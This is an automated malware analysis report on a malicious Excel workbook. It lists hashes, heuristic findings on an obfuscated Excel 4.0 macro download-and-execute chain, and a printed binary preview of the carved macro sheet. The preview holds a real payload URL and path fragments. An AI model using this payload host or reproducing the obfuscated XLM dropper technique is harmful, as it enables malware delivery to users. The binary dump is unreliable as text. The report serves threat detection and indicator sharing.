Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 fd4b1db8696d0dc7…

MALICIOUS

Office (OOXML) / .XLSX

277.4 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-11-05
MD5: 7f1368cccf51636cf4c149f8ff0ca67b SHA-1: 0bf415136adbb1ca2186d4f89ad00851cf5d08c0 SHA-256: fd4b1db8696d0dc73bbbeae5e99c3293b7c4a279be8894a9c163e265a4f40930
184 Risk Score

Heuristics 5

  • Excel 4.0 macro sheet (1 sheet(s)) critical 3 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
  • URL reconstructed from XLM cell array (2 URLs) critical OOXML_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
  • XLM payload URL string (1 URL) info OOXML_XLM_PAYLOAD_URL
    An Excel 4.0 (XLM) macro-sheet workbook with download/execute evidence carries a literal http(s) URL stored as a (often UTF-16) string in the shared-string table or a cell. This is the next-stage payload host referenced by the macro download chain (URLDownloadToFile/ShellExecute); surfaced as an IOC.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ubercancellationfeelawsuit.com/.png Referenced by macro
    • http://ubercancellationfeelawsuit.com/p.pngReferenced by macro
    • http://ubercancellationfeelawsuit.com/Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 5838 bytes
SHA-256: 443d8f56ba0263cae9d9e4ea62c56e7866d39308e15628abcb5f916bfa3d3676
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �      �	      @   �  �  �             @   d           � $                                    �  �  %      ��    & �  �           �  <     �?  �         �  �  %      ��    &                        @                 	!.                     D    /�    %      ��    &                        @    � =       �   E W W E F R E W W U E U W E U I Y W 7 4 3 3 3 R 3 4 H H J H H 5 4 H 5 4 H J 4 5 J H 4 5 J H H 5 J R E J H R E J J F J F J E R J H F J H F R H R E F H R E H F H J R E F J H R E F H J R E F H R F E H J T G R H J R R G H T R H H R T E F F J T R E H T R E F J F E R T J F J R J H R J F J J H E R F H J F E R E R F   <    � E W W E F R E W W U E U W E U I Y W 7 4 3 3 3 R 3 4 H H J H H 5 4 H 5 4 H J 4 5 J H 4 5 J H H 5 J R E J H R E J J F J F J E R J H F J H F R H R E F H R E H F H J R E F J H R E F H J R E F H R F E H J T G R H J R R G H T R H H R T E F F J T R E H T R E F J F E R T J F J R J H R J F J J H E R F H J F E R E R F A�      � ?       �   E R F F E R E R G U E O R U R F U E G U G T U E T Y T U G T E Y F E R U Y U Y U U Y 4 Y R E Y Y E Y U Y Y F U R F R 8 8 E R F J R H J F E R H E J J J J J 4 3 W U I E I I F K W E 4 H F X D B F E R H B E R J H H J W 3 4 8 8 4 W E O F I J E W I F J R K E F R J K F J D B D F V B N S D O P I U Y Q A Z W S D F G H V B O P E J F N N E R N G H R N F J I F K E W K F D K S A B X C B B E R N B W E I J F W E K G K E   �    � E R F F E R E R G U E O R U R F U E G U G T U E T Y T U G T E Y F E R U Y U Y U U Y 4 Y R E Y Y E Y U Y Y F U R F R 8 8 E R F J R H J F E R H E J J J J J 4 3 W U I E I I F K W E 4 H F X D B F E R H B E R J H H J W 3 4 8 8 4 W E O F I J E W I F J R K E F R J K F J D B D F V B N S D O P I U Y Q A Z W S D F G H V B O P E J F N N E R N G H R N F J I F K E W K F D K S A B X C B B E R N B W E I J F W E K G K E    U S A A0       @           %      ��    &                        @    � >       �   R E R V U I U E T G R E R Y E F Y Y U E F Y U E F R Y U Y E U Y U E F T Y U E T H G Y E Y U T E E F R F R R I U Y I O O W O E I I I I I I I I I I D F J W E I O F R I U R E U E G E E E E E R U I I I I I I I I I I I I I I I I I I I I I I I I I I O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O I I I I E I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I   �    � R E R V U I U E T G R E R Y E F Y Y U E F Y U E F R Y U Y E U Y U E F T Y U E T H G Y E Y U T E E F R F R R I U Y I O O W O E I I I I I I I I I I D F J W E I O F R I U R E U E G E E E E E R U I I I I I I I I I I I I I I I I I I I I I I I I I I O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O I I I I E I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I    D S A0     %      ��    &   �                %      ��    &   }                                      %      ��    &   ~                        	A             &��  '   D}    �D~    �D     �D�    �     	 B �                   %      ��    &                            	-              �?      #    $�    �   B �                   %      ��    &   �                        	E              �?  +   #    D�    �D�    � D�    � D�    �    B �                   %      ��    &   �                        	�           ���<��  g   D�    �D�    � D�    � D�    � D�    �D�    � D�    � D�    � D�    � D�    � D�    �D�    �     	 B �                    6            e x p l          e    x    p    l B P     %      ��    &   �                        	n                  T   #       $�    �D�    �D�    � D�    � D�    � D�    � D�    � D�    � $�    �   B �                    6            o r e r          o    r    e    r B P     %      ��    &   �                        	Y          ������  ?   D�    �D�    �D�    � D�    � D�    � D�    �D�    �     	 B �                    Y        	   C : \ d c x r e \   1      C    :    \    d    c    x    r    e    \ B	P     %      ��    &   �                        	r              E@  X   #       D�    �D�    � D�    �D�    � D�    � D�    � D�    � D�    � D�    �       B �               	    6            x e q e          x    e    q    e B P     %      ��    &   �                         �         +   h t t p : / / u b e r c a n c e l l a t i o n f e e l a w s u i t . c o m / p . p n g   c    & h t t p : / / u b e r c a n c e l l a t i o n f e e l a w s u i t . c o m / D�    �    . p n g       (            o a          o    a B P     %      ��    &   �                                  
    /            m a \          m    a    \ B P     %      ��    &   �                                                     =            s x p e t          s    x    p    e    t B P     %      ��    &   �                                    �?              %      ��    &   �                                  
   %      ��    &   �                        
                B 6                   %      ��    &   �                                      %      ��    &   �                                      %      ��    &   �                                      U          U     %      ��    &   �                                      %      ��    &   �                                      %      ��    &   �                                      %      ��    &   �                                      %      ��    &   �                                      %      ��    &   �                                      %      ��    &   �                        	3            H/ A               p  A     TX$AA�     %      ��    &   �                %      ��    &   `                %      ��    &   �	                                     �  � B                                                                  �    � 0ffffff�?ffffff�?      �?      �?333333�?333333�?� .	   d   ,   ,                         r I d 2 �

Open this report in the interactive analyzer, or submit your own file for analysis.